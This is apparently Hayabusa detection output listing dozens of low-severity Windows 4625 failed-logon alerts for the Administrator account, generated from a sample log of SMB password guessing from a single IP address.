+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.241 